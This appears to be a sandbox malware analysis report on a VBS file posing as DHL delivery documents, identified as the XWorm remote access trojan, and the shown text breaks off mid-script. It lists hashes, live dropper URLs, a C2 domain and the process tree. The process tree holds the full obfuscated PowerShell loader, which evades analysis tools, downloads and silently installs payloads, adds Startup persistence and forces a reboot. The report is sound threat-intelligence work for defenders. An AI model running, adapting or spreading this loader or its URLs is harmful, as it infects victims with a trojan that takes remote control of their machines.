Overview

overview

10

Static

static

1

awb_post_d...df.vbs

windows7-x64

10

awb_post_d...df.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    146s
  • max time network
    137s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250217-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
  • submitted
    07/03/2025, 16:00

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    awb_post_dhl_delivery_documents_pdf.vbs

  • Size

    177KB

  • MD5

    63fa1b58e48acb386a8b650951530771

  • SHA1

    adf30b16e042e3d4cf2c5c570ec0afcf446afac0

  • SHA256

    119a6e21aa53c235fe4a946d74e870b41823d1cf49c39d29a528e1a0ddfd9042

  • SHA512

    8c328b2876d05cb649190578565daa152f145e0dce86b3aae8eca826f09796040fcc856911050e2540a9df92cf923c90cac6848e5326e2040dd415993dcd7107

  • SSDEEP

    384:JffffffffQffffffffQffffffffmh44444444D4c0YAL8ZNGJoNycffffffffQfS:K0Yq/G

Score
10/10
xwormdefense_evasiondiscoveryexecutionpersistencerattrojan

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

https://www.pastery.net/rdakwa/raw/
exe.dropper

https://files.catbox.moe/sakuuo.msu
exe.dropper

https://files.catbox.moe/6sdjc5.msu
exe.dropper

https://www.pastery.net/rdakwa/raw/

Extracted

Family

xworm

Version

5.0

C2

freeetradingzone.duckdns.org:3911

Mutex

LpxI7BBpG4bLELYn

Attributes
  • install_file

    USB.exe

aes.plain

Signatures

  • Detect Xworm Payload 1 IoCs
  • UAC bypass 3 TTPs 1 IoCs
    defense_evasiontrojan
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Xworm family
    xworm
  • Blocklisted process makes network request 6 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 20 IoCs

    Using powershell.exe command.

    execution
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Adds Run key to start application 2 TTPs 11 IoCs
    persistence
  • Hide Artifacts: Hidden Window 1 TTPs 2 IoCs

    Windows that would typically be displayed when an application carries out an operation can be hidden.

    defense_evasion
  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

    defense_evasion
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 6 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs ping.exe 1 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 51 IoCs
  • Suspicious use of AdjustPrivilegeToken 20 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\awb_post_dhl_delivery_documents_pdf.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:760
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $wfdyx = 'Ow' + [char]66 + '9ADsAIA' + [char]66 + 'pAFQAQw' + [char]66 + '2AFgAJAAgAGUAbA' + [char]66 + 'pAEYALQAgAHMAcw' + [char]66 + 'hAHAAeQ' + [char]66 + 'CACAAeQ' + [char]66 + 'jAGkAbA' + [char]66 + 'vAFAAbg' + [char]66 + 'vAGkAdA' + [char]66 + '1AGMAZQ' + [char]66 + '4AEUALQAgAGwAbA' + [char]66 + 'lAGgAcw' + [char]66 + 'yAGUAdw' + [char]66 + 'vAHAAOwAgAGUAYw' + [char]66 + 'yAG8AZgAtACAAIA' + [char]66 + 'pAFQAQw' + [char]66 + '2AFgAJAAgAGgAdA' + [char]66 + 'hAFAAZQ' + [char]66 + 'sAGkARgAtACAAZQ' + [char]66 + 'sAGkARgAtAHQAdQ' + [char]66 + 'PACAAfAAgAHcAeQ' + [char]66 + '5AEUAUgAkADsAIAApACAAJwAxAHMAcAAuADMAMA' + [char]66 + 'sAGwAZAAnACAAKwAgACkAKA' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAHAAbQ' + [char]66 + 'lAFQAdA' + [char]66 + 'lAEcAOgA6AF0AaA' + [char]66 + '0AGEAUAAuAE8ASQAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAAoACAAPQAgAGkAVA' + [char]66 + 'DAHYAWAAkADsAIAAnADsAKQAgACkAIAAnACcAbQ' + [char]66 + 'zAGEAZw' + [char]66 + 'lAHIAXAA5ADEAMwAwADMALgAwAC4ANA' + [char]66 + '2AFwAaw' + [char]66 + 'yAG8Adw' + [char]66 + 'lAG0AYQ' + [char]66 + 'yAGYAXA' + [char]66 + '0AGUAbgAuAHQAZg' + [char]66 + 'vAHMAbw' + [char]66 + 'yAGMAaQ' + [char]66 + 'tAFwAcw' + [char]66 + '3AG8AZA' + [char]66 + 'uAGkAdw' + [char]66 + 'cADoAYw' + [char]66 + 'EADEARAAgAEQAJwAnACAALAAgACcAJwAlAEkAaA' + [char]66 + 'xAFIAWAAlACcAJwAgACwAIAAnACcAaA' + [char]66 + '0AHQAcA' + [char]66 + 'zADoALwAvAGcAcg' + [char]66 + 'vAHcAdA' + [char]66 + 'oAGkAbg' + [char]66 + 'zAGkAZw' + [char]66 + 'oAHQAaQ' + [char]66 + '0AC4AYw' + [char]66 + 'vAG0ALw' + [char]66 + 'pAG0AYQ' + [char]66 + 'nAGUAcwAvAHMAdA' + [char]66 + 'yAGUAYQ' + [char]66 + 'tAGYAYQ' + [char]66 + 'yAG0AcwAuAGIAaQ' + [char]66 + 'uACcAJwAgACgAIA' + [char]66 + 'dAF0AWw' + [char]66 + '0AGMAZQ' + [char]66 + 'qAGIAbw' + [char]66 + 'bACAALAAgAGwAbA' + [char]66 + '1AG4AJAAgACgAZQ' + [char]66 + 'rAG8Adg' + [char]66 + 'uAEkALgApACAAJwAnAEkAVg' + [char]66 + 'GAHIAcAAnACcAIAAoAGQAbw' + [char]66 + 'oAHQAZQAnACAAPQArACAAdw' + [char]66 + '5AHkARQ' + [char]66 + 'SACQAOwAgACcATQ' + [char]66 + '0AGUARwAuACkAIAAnACcAMQ' + [char]66 + 'zAHMAYQ' + [char]66 + 'sAEMALgAzAHkAcg' + [char]66 + 'hAHIAYg' + [char]66 + 'pAEwAcw' + [char]66 + 'zAGEAbA' + [char]66 + 'DACcAJwAgACgAZQ' + [char]66 + 'wAHkAVA' + [char]66 + '0AGUARwAnACAAPQArACAAdw' + [char]66 + '5AHkARQ' + [char]66 + 'SACQAOwAgACcALgApACAAcg' + [char]66 + 'GAGQAWQ' + [char]66 + 'SACQAIAAoAGQAYQ' + [char]66 + 'vAEwALg' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + '0AG4AZQ' + [char]66 + 'yAHIAdQ' + [char]66 + 'DADoAJwAgACsAIAAnADoAXQ' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + 'wAHAAQQAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAJwAgAD0AKwAgAHcAeQ' + [char]66 + '5AEUAUgAkADsAIAAnADsAIAApACAAKQAnACcAQQAnACcALAAnACcAkyE6AJMhJwAnACgAZQ' + [char]66 + 'jAGEAbA' + [char]66 + 'wAGUAcgAuAEcAZQ' + [char]66 + 'hAHkAcgAkACAAKA' + [char]66 + 'nAG4AaQ' + [char]66 + 'yAHQAUwA0ADYAZQ' + [char]66 + 'zAGEAQg' + [char]66 + 'tAG8Acg' + [char]66 + 'GADoAOg' + [char]66 + 'dAHQAcg' + [char]66 + 'lAHYAbg' + [char]66 + 'vAEMALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAcw' + [char]66 + 'bACAAPQAgAHIARg' + [char]66 + 'kAFkAUgAkACAAXQ' + [char]66 + 'dAFsAZQ' + [char]66 + '0AHkAQg' + [char]66 + 'bACcAIAA9ACsAIA' + [char]66 + '3AHkAeQ' + [char]66 + 'FAFIAJAA7ACAAJwA7ACkAOA' + [char]66 + 'GAFQAVQAgAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAtACAAbw' + [char]66 + 'JAFkAZg' + [char]66 + '0ACQAIA' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAC0AIA' + [char]66 + '0AG4AZQ' + [char]66 + '0AG4Abw' + [char]66 + 'DAC0AdA' + [char]66 + 'lAEcAKAAgAD0AIA' + [char]66 + 'HAGUAYQ' + [char]66 + '5AHIAJAAgADsAIAApACAAJwAnAHQAeA' + [char]66 + '0AC4AMgAwAGwAbA' + [char]66 + 'kACcAJwAgACsAIAApACgAaA' + [char]66 + '0AGEAUA' + [char]66 + 'wAG0AZQ' + [char]66 + 'UAHQAZQ' + [char]66 + 'HADoAOg' + [char]66 + 'dAGgAdA' + [char]66 + 'hAFAALg' + [char]66 + 'PAEkALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACAAKAAgAD0AIA' + [char]66 + 'vAEkAWQ' + [char]66 + 'mAHQAJAAnACAAPQAgAHcAeQ' + [char]66 + '5AEUAUgAkADsAIA' + [char]66 + 'lAGMAcg' + [char]66 + 'vAGYALQAgAGIAeg' + [char]66 + 'NAGUAUAAkACAAaA' + [char]66 + '0AGEAUA' + [char]66 + 'lAGwAaQ' + [char]66 + 'GAC0AIA' + [char]66 + 'lAGwAaQ' + [char]66 + 'GAC0AdA' + [char]66 + '1AE8AIA' + [char]66 + '8ACAARA' + [char]66 + 'lAHoAaw' + [char]66 + 'TACQAOwApAGwASw' + [char]66 + 'UAGwAVAAkACgAZw' + [char]66 + 'uAGkAcg' + [char]66 + '0AFMAdA' + [char]66 + 'lAEcALgA4AEYAVA' + [char]66 + 'VADoAOg' + [char]66 + 'dAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAuAHQAeA' + [char]66 + 'lAFQALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACAAPQAgAEQAZQ' + [char]66 + '6AGsAUwAkADsAIAApACAARA' + [char]66 + 'KAGcAUA' + [char]66 + 'JACQAIAAoAGEAdA' + [char]66 + 'hAEQAZA' + [char]66 + 'hAG8AbA' + [char]66 + 'uAHcAbw' + [char]66 + 'EAC4AUg' + [char]66 + 'JAEYATQ' + [char]66 + 'rACQAIAA9ACAAbA' + [char]66 + 'LAFQAbA' + [char]66 + 'UACQAOwAgACkAIA' + [char]66 + 'mAHEATg' + [char]66 + 'aAGMAJAAgAGgAdA' + [char]66 + 'hAFAALQAgAHQAbg' + [char]66 + 'lAHQAbg' + [char]66 + 'vAEMALQ' + [char]66 + '0AGUARwAgACgAIAA9ACAAIA' + [char]66 + 'EAEoAZw' + [char]66 + 'QAEkAJAA7ACAAOA' + [char]66 + 'GAFQAVQA6ADoAXQ' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + '0AHgAZQ' + [char]66 + 'UAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + 'SAEkARg' + [char]66 + 'NAGsAJAA7ACAAdA' + [char]66 + 'uAGUAaQ' + [char]66 + 'sAEMAYg' + [char]66 + 'lAFcALg' + [char]66 + '0AGUATgAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TACAAdA' + [char]66 + 'jAGUAag' + [char]66 + 'iAE8ALQ' + [char]66 + '3AGUATgAgAD0AIA' + [char]66 + 'SAEkARg' + [char]66 + 'NAGsAJAA7ACAAKQAgACcAdA' + [char]66 + '4AHQALgAyADAAbA' + [char]66 + 'sAGQAJwAgACsAIAApACgAaA' + [char]66 + '0AGEAUA' + [char]66 + 'wAG0AZQ' + [char]66 + 'UAHQAZQ' + [char]66 + 'HADoAOg' + [char]66 + 'dAGgAdA' + [char]66 + 'hAFAALg' + [char]66 + 'PAEkALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACAAKAAgAD0AIA' + [char]66 + 'iAHoATQ' + [char]66 + 'lAFAAJAA7ACAAZQ' + [char]66 + 'jAHIAbw' + [char]66 + 'mAC0AIAAnADgARg' + [char]66 + 'UAFUAJwAgAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAtACAAZg' + [char]66 + 'xAE4AWg' + [char]66 + 'jACQAIA' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAGUAbA' + [char]66 + 'pAEYALQAgAGUAbA' + [char]66 + 'pAEYALQ' + [char]66 + '0AHUATwAgAHwAIA' + [char]66 + 'VAHMAeg' + [char]66 + 'XAFQAJAA7AHkATQ' + [char]66 + 'lAHMAYQ' + [char]66 + 'CACAAPQAgAFUAcw' + [char]66 + '6AFcAVAAkACAAOw' + [char]66 + 'VAHMAeg' + [char]66 + 'XAFQAJAAgAD0AIA' + [char]66 + 'lAHMAYQ' + [char]66 + 'iAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 'TACQAOwAgACkAIA' + [char]66 + 'qAHoAdg' + [char]66 + 'kAGgAJAAgACgAZw' + [char]66 + 'uAGkAcg' + [char]66 + '0AFMAZA' + [char]66 + 'hAG8AbA' + [char]66 + 'uAHcAbw' + [char]66 + 'EAC4AdA' + [char]66 + 'uAGUAaQ' + [char]66 + 'sAEMAYg' + [char]66 + 'lAHcAJAAgAD0AIA' + [char]66 + 'VAHMAeg' + [char]66 + 'XAFQAJAA7ACAAdA' + [char]66 + 'uAGUAaQ' + [char]66 + 'sAEMAYg' + [char]66 + 'lAFcALg' + [char]66 + '0AGUATgAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TACAAdA' + [char]66 + 'jAGUAag' + [char]66 + 'iAE8ALQ' + [char]66 + '3AGUATgAgAD0AIA' + [char]66 + '0AG4AZQ' + [char]66 + 'pAGwAQw' + [char]66 + 'iAGUAdwAkADsAKQAgACcAdA' + [char]66 + '4AHQALgAxADAAbA' + [char]66 + 'sAGQAJwAgACsAIAApACgAaA' + [char]66 + '0AGEAUA' + [char]66 + 'wAG0AZQ' + [char]66 + 'UAHQAZQ' + [char]66 + 'HADoAOg' + [char]66 + 'dAGgAdA' + [char]66 + 'hAFAALg' + [char]66 + 'PAEkALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACAAKAAgAD0AIA' + [char]66 + 'mAHEATg' + [char]66 + 'aAGMAJAA7ACkAIAAnAC8Adw' + [char]66 + 'hAHIALw' + [char]66 + 'hAHcAaw' + [char]66 + 'hAGQAcgAvAHQAZQ' + [char]66 + 'uAC4AeQ' + [char]66 + 'yAGUAdA' + [char]66 + 'zAGEAcAAuAHcAdw' + [char]66 + '3AC8ALwA6AHMAcA' + [char]66 + '0AHQAaAAnACgAIAA9ACAAag' + [char]66 + '6AHYAZA' + [char]66 + 'oACQAOw' + [char]66 + '9ADsAcg' + [char]66 + 'GAGQAWQ' + [char]66 + 'SACQAIA' + [char]66 + 'uAHIAdQ' + [char]66 + '0AGUAcgA7ACkAKQ' + [char]66 + 'lAHMAYQ' + [char]66 + 'iAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 'TACQAKA' + [char]66 + 'nAG4AaQ' + [char]66 + 'yAHQAUwA0ADYAZQ' + [char]66 + 'zAGEAQg' + [char]66 + 'tAG8Acg' + [char]66 + 'GADoAOg' + [char]66 + 'dAHQAcg' + [char]66 + 'lAHYAbg' + [char]66 + 'vAEMALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAcw' + [char]66 + 'bACgAZw' + [char]66 + 'uAGkAcg' + [char]66 + '0AFMAdA' + [char]66 + 'lAEcALgA4AEYAVA' + [char]66 + 'VADoAOg' + [char]66 + 'dAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAuAHQAeA' + [char]66 + 'lAFQALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACAAPQAgAHIARg' + [char]66 + 'kAFkAUgAkADsAew' + [char]66 + '5AE0AZQ' + [char]66 + 'zAGEAQgAgAG4Abw' + [char]66 + 'pAHQAYw' + [char]66 + 'uAHUARgA7AGUAcw' + [char]66 + 'hAGIAZw' + [char]66 + 'uAGkAcg' + [char]66 + '0AFMAJAA7ACAAMgAxAHMAbA' + [char]66 + 'UADoAOg' + [char]66 + 'dAGUAcA' + [char]66 + '5AFQAbA' + [char]66 + 'vAGMAbw' + [char]66 + '0AG8Acg' + [char]66 + 'QAHkAdA' + [char]66 + 'pAHIAdQ' + [char]66 + 'jAGUAUwAuAHQAZQ' + [char]66 + 'OAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'sAG8AYw' + [char]66 + 'vAHQAbw' + [char]66 + 'yAFAAeQ' + [char]66 + '0AGkAcg' + [char]66 + '1AGMAZQ' + [char]66 + 'TADoAOg' + [char]66 + 'dAHIAZQ' + [char]66 + 'nAGEAbg' + [char]66 + 'hAE0AdA' + [char]66 + 'uAGkAbw' + [char]66 + 'QAGUAYw' + [char]66 + 'pAHYAcg' + [char]66 + 'lAFMALg' + [char]66 + '0AGUATgAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAOw' + [char]66 + '9ACAACgANADsAdA' + [char]66 + 'pAHgAZQAgACAAIAAgACAAIAAKAA0AOwAgAGUAYw' + [char]66 + 'yAG8AZgAtACAAcg' + [char]66 + 'lAHQAdQ' + [char]66 + 'wAG0Abw' + [char]66 + 'DAC0AdA' + [char]66 + 'yAGEAdA' + [char]66 + 'zAGUAUgAKAA0AIA' + [char]66 + '7AGUAcw' + [char]66 + 'sAGUACgANAAoADQ' + [char]66 + '9AAoADQAgACAAIAAgACAAIAAgAAoADQAgAHsAKQ' + [char]66 + 'sAGwAdQ' + [char]66 + 'OACQAIA' + [char]66 + 'xAGUALQAgACkAZQ' + [char]66 + '1AG4AaQ' + [char]66 + '0AG4Abw' + [char]66 + 'DAHkAbA' + [char]66 + '0AG4AZQ' + [char]66 + 'sAGkAUwAgAGEAZQAtACAAJw' + [char]66 + 'lAHoAeQ' + [char]66 + 'sAGEAbg' + [char]66 + 'hACcALAAnAFMATg' + [char]66 + 'EAGUAdA' + [char]66 + 'hAHAAYQAnACwAJw' + [char]66 + 'rAHIAYQ' + [char]66 + 'oAHMAZQ' + [char]66 + 'yAGkAVwAnACAAcw' + [char]66 + 'zAGUAYw' + [char]66 + 'vAHIAcAAtAHQAZQ' + [char]66 + 'nACgAKA' + [char]66 + 'mAGkAOwAgADIAMQ' + [char]66 + 'zAGwAVAA6ADoAXQ' + [char]66 + 'lAHAAeQ' + [char]66 + 'UAGwAbw' + [char]66 + 'jAG8AdA' + [char]66 + 'vAHIAUA' + [char]66 + '5AHQAaQ' + [char]66 + 'yAHUAYw' + [char]66 + 'lAFMALg' + [char]66 + '0AGUATgAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAA9ACAAbA' + [char]66 + 'vAGMAbw' + [char]66 + '0AG8Acg' + [char]66 + 'QAHkAdA' + [char]66 + 'pAHIAdQ' + [char]66 + 'jAGUAUwA6ADoAXQ' + [char]66 + 'yAGUAZw' + [char]66 + 'hAG4AYQ' + [char]66 + 'NAHQAbg' + [char]66 + 'pAG8AUA' + [char]66 + 'lAGMAaQ' + [char]66 + '2AHIAZQ' + [char]66 + 'TAC4AdA' + [char]66 + 'lAE4ALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bAHsAIA' + [char]66 + 'lAHMAbA' + [char]66 + 'lAH0AIA' + [char]66 + 'mAC8AIAAwACAAdAAvACAAcgAvACAAZQ' + [char]66 + '4AGUALg' + [char]66 + 'uAHcAbw' + [char]66 + 'kAHQAdQ' + [char]66 + 'oAHMAIAA7ACcAMAA4ADEAIA' + [char]66 + 'wAGUAZQ' + [char]66 + 'sAHMAJwAgAGQAbg' + [char]66 + 'hAG0AbQ' + [char]66 + 'vAGMALQAgAGUAeA' + [char]66 + 'lAC4AbA' + [char]66 + 'sAGUAaA' + [char]66 + 'zAHIAZQ' + [char]66 + '3AG8AcAA7ACAAZQ' + [char]66 + 'jAHIAbw' + [char]66 + 'mAC0AIAApACAAJw' + [char]66 + 'wAHUAdA' + [char]66 + 'yAGEAdA' + [char]66 + 'TAFwAcw' + [char]66 + 'tAGEAcg' + [char]66 + 'nAG8Acg' + [char]66 + 'QAFwAdQ' + [char]66 + 'uAGUATQAgAHQAcg' + [char]66 + 'hAHQAUw' + [char]66 + 'cAHMAdw' + [char]66 + 'vAGQAbg' + [char]66 + 'pAFcAXA' + [char]66 + '0AGYAbw' + [char]66 + 'zAG8Acg' + [char]66 + 'jAGkATQ' + [char]66 + 'cAGcAbg' + [char]66 + 'pAG0AYQ' + [char]66 + 'vAFIAXA' + [char]66 + 'hAHQAYQ' + [char]66 + 'EAHAAcA' + [char]66 + '' + [char]66 + 'AFwAJwAgACsAIA' + [char]66 + 'XAEMAdw' + [char]66 + '' + [char]66 + 'AEcAJAAgACgAIA' + [char]66 + 'uAG8AaQ' + [char]66 + '0AGEAbg' + [char]66 + 'pAHQAcw' + [char]66 + 'lAEQALQAgACcAJQ' + [char]66 + 'JAGgAcQ' + [char]66 + 'SAFgAJQAnACAAbQ' + [char]66 + 'lAHQASQAtAHkAcA' + [char]66 + 'vAEMAIAA7ACAAdA' + [char]66 + 'yAGEAdA' + [char]66 + 'zAGUAcg' + [char]66 + 'vAG4ALwAgAHQAZQ' + [char]66 + 'pAHUAcQAvACAARQ' + [char]66 + 'vAEEAbA' + [char]66 + 'nACQAIA' + [char]66 + 'lAHgAZQAuAGEAcw' + [char]66 + '1AHcAIA' + [char]66 + 'lAHgAZQAuAGwAbA' + [char]66 + 'lAGgAcw' + [char]66 + 'yAGUAdw' + [char]66 + 'vAHAAIAA7ACkAJw' + [char]66 + '1AHMAbQAuAG4AaQ' + [char]66 + '3AHAAVQ' + [char]66 + 'cACcAIAArACAAWQ' + [char]66 + 'OAEsAYg' + [char]66 + 'mACQAKAAgAD0AIA' + [char]66 + 'FAG8AQQ' + [char]66 + 'sAGcAJAA7ACkAIA' + [char]66 + 'lAG0AYQ' + [char]66 + 'OAHIAZQ' + [char]66 + 'zAFUAOgA6AF0AdA' + [char]66 + 'uAGUAbQ' + [char]66 + 'uAG8Acg' + [char]66 + 'pAHYAbg' + [char]66 + 'FAFsAIAArACAAJw' + [char]66 + 'cAHMAcg' + [char]66 + 'lAHMAVQ' + [char]66 + 'cADoAQwAnACAAKAAgAD0AIA' + [char]66 + 'XAEMAdw' + [char]66 + '' + [char]66 + 'AEcAJAA7ACkAIAApACcAdQ' + [char]66 + 'zAG0ALg' + [char]66 + 'uAGkAdw' + [char]66 + 'wAFUAXAAnACAAKwAgAFkATg' + [char]66 + 'LAGIAZgAkACgAIAAsAGQAYg' + [char]66 + 'rAHEAdAAkACAAKA' + [char]66 + 'lAGwAaQ' + [char]66 + 'GAGQAYQ' + [char]66 + 'vAGwAbg' + [char]66 + '3AG8ARAAuAGsAag' + [char]66 + 'yAG4AbgAkADsAOA' + [char]66 + 'GAFQAVQA6ADoAXQ' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + '0AHgAZQ' + [char]66 + 'UAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + 'rAGoAcg' + [char]66 + 'uAG4AJAA7ACkAdA' + [char]66 + 'uAGUAaQ' + [char]66 + 'sAEMAYg' + [char]66 + 'lAFcALg' + [char]66 + '0AGUATgAgAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'PAC0Adw' + [char]66 + 'lAE4AKAAgAD0AIA' + [char]66 + 'rAGoAcg' + [char]66 + 'uAG4AJAA7AH0AOwAgACkAZA' + [char]66 + 'iAGsAcQ' + [char]66 + '0ACQAKAAgAD0AIA' + [char]66 + 'kAGIAaw' + [char]66 + 'xAHQAJA' + [char]66 + '7ACAAZQ' + [char]66 + 'zAGwAZQ' + [char]66 + '9ADsAIA' + [char]66 + 'zAG8Abg' + [char]66 + 'lAG0AJAAgAD0AIA' + [char]66 + 'kAGIAaw' + [char]66 + 'xAHQAJA' + [char]66 + '7ACAAKQAgAHcAVg' + [char]66 + 'nAGgARQAkACAAKAAgAGYAaQA7ACAAKQAnADQANgAnACgAcw' + [char]66 + 'uAGkAYQ' + [char]66 + '0AG4Abw' + [char]66 + 'DAC4ARQ' + [char]66 + 'SAFUAVA' + [char]66 + 'DAEUAVA' + [char]66 + 'JAEgAQw' + [char]66 + 'SAEEAXw' + [char]66 + 'SAE8AUw' + [char]66 + 'TAEUAQw' + [char]66 + 'PAFIAUAA6AHYAbg' + [char]66 + 'lACQAIAA9ACAAdw' + [char]66 + 'WAGcAaA' + [char]66 + 'FACQAOwAnAHUAcw' + [char]66 + 'tAC4ANQ' + [char]66 + 'jAGoAZA' + [char]66 + 'zADYALw' + [char]66 + 'lAG8AbQAuAHgAbw' + [char]66 + 'iAHQAYQ' + [char]66 + 'jAC4Acw' + [char]66 + 'lAGwAaQ' + [char]66 + 'mAC8ALwA6AHMAcA' + [char]66 + '0AHQAaAAnACAAPQAgAHMAbw' + [char]66 + 'uAGUAbQAkADsAJw' + [char]66 + '1AHMAbQAuAG8AdQ' + [char]66 + '1AGsAYQ' + [char]66 + 'zAC8AZQ' + [char]66 + 'vAG0ALg' + [char]66 + '4AG8AYg' + [char]66 + '0AGEAYwAuAHMAZQ' + [char]66 + 'sAGkAZgAvAC8AOg' + [char]66 + 'zAHAAdA' + [char]66 + '0AGgAJwAgAD0AIA' + [char]66 + 'kAGIAaw' + [char]66 + 'xAHQAJAA7ACkAIAAnAHUAcw' + [char]66 + 'tAC4Abg' + [char]66 + 'pAHcAcA' + [char]66 + 'VAFwAJwAgACsAIA' + [char]66 + 'ZAE4ASw' + [char]66 + 'iAGYAJAAgACgAIA' + [char]66 + 'sAGUAZAA7ACkAIAApACgAaA' + [char]66 + '0AGEAUA' + [char]66 + 'wAG0AZQ' + [char]66 + 'UAHQAZQ' + [char]66 + 'HADoAOg' + [char]66 + 'dAGgAdA' + [char]66 + 'hAFAALg' + [char]66 + 'PAEkALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACAAKAAgAD0AIA' + [char]66 + 'ZAE4ASw' + [char]66 + 'iAGYAJA' + [char]66 + '7ACAAKQAgAFoAWg' + [char]66 + 'rAFQATAAkACAAKAAgAGYAaQA7ACAAKQAyACgAcw' + [char]66 + 'sAGEAdQ' + [char]66 + 'xAEUALg' + [char]66 + 'yAG8Aag' + [char]66 + 'hAE0ALg' + [char]66 + 'uAG8AaQ' + [char]66 + 'zAHIAZQ' + [char]66 + 'WAC4AdA' + [char]66 + 'zAG8AaAAkACAAPQAgAFoAWg' + [char]66 + 'rAFQATAAkACAAOwA=';$wfdyx = $wfdyx.replace('的杰是' , 'B') ;;$fjptf = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $wfdyx ) ); $fjptf = $fjptf[-1..-$fjptf.Length] -join '';$fjptf = $fjptf.replace('%XRqhI%','C:\Users\Admin\AppData\Local\Temp\awb_post_dhl_delivery_documents_pdf.vbs');powershell $fjptf
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3140
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $LTkZZ = $host.Version.Major.Equals(2) ;if ( $LTkZZ ) {$fbKNY = ( [System.IO.Path]::GetTempPath() );del ( $fbKNY + '\Upwin.msu' );$tqkbd = 'https://files.catbox.moe/sakuuo.msu';$menos = 'https://files.catbox.moe/6sdjc5.msu';$EhgVw = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $EhgVw ) {$tqkbd = $menos ;}else {$tqkbd = ($tqkbd) ;};$nnrjk = (New-Object Net.WebClient);$nnrjk.Encoding = [System.Text.Encoding]::UTF8;$nnrjk.DownloadFile( $tqkbd, ($fbKNY + '\Upwin.msu') );$GAwCW = ( 'C:\Users\' + [Environment]::UserName );$glAoE = ($fbKNY + '\Upwin.msu'); powershell.exe wusa.exe $glAoE /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Local\Temp\awb_post_dhl_delivery_documents_pdf.vbs' -Destination ( $GAwCW + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;if((get-process 'Wireshark','apateDNS','analyze' -ea SilentlyContinue) -eq $Null){ } else{ Restart-Computer -force ; exit; };[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;$Stringbase;Function BaseMy{;$RYdFr = 